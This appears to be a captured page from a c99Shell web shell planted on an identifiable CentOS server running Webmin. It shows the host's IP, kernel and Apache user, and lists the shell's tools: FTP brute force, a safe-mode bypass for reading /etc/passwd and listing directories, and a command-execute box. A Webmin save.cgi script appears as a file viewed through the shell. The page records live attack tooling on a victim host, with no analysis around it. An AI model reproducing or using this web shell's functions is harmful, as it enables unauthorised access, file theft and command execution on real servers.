110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /usr/libexec/webmin/custom/ drwxr-xr-x Free 51.95 GB of 127.8 GB (40.65%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/usr/libexec/webmin/custom/ drwxr-xr-x
Free 51.95 GB of 127.8 GB (40.65%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


#!/usr/bin/perl
# save.cgi
# Save an edited file

require './custom-lib.pl';
&ReadParseMime();
$edit = &get_command($in{'id'}, $in{'idx'});
&error_setup($text{'view_err'});
$edit->{'edit'} && &can_run_command($edit) || &error($text{'edit_ecannot'});

# Work out proper filename
$file = $edit->{'edit'};
if ($file !~ /^\//) {
    # File is relative to user's home directory
    @uinfo = getpwnam($remote_user);
    $file = "$uinfo[7]/$file" if (@uinfo);
    }

# Set environment variables for parameters
($env, $export, $str, $displayfile) = &set_parameter_envs($edit, $file);

if ($edit->{'envs'} || @{$edit->{'args'}}) {
    # Do environment variable substitution
    chop($file = `echo "$file"`);
    }

# Run the before-command
if ($edit->{'before'}) {
    $out = &backquote_logged("($edit->{'before'}) 2>&1 </dev/null");
    &error(&text('view_ebefore', &html_escape($out))) if ($?);
    }

# Save the file
$in{'data'} =~ s/\r//g;
&open_lock_tempfile(FILE, ">$file", 1) ||
    &error(&text('view_efile', $file, $!));
&print_tempfile(FILE, $in{'data'});
&close_tempfile(FILE);

# Set permissions
if ($edit->{'user'}) {
    &system_logged("chown $edit->{'user'}:$edit->{'group'} ".
               "$file >/dev/null 2>&1");
    }
if ($edit->{'perms'}) {
    &system_logged("chmod $edit->{'perms'} ".
               "$file >/dev/null 2>&1");
    }

# Run the after-command
if ($edit->{'after'}) {
    $out = &backquote_logged("($edit->{'after'}) 2>&1 </dev/null");
    &error(&text('view_eafter', &html_escape($out))) if ($?);
    }

&webmin_log("save", "edit", $cmd->{'id'}, $edit);
&redirect("");

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: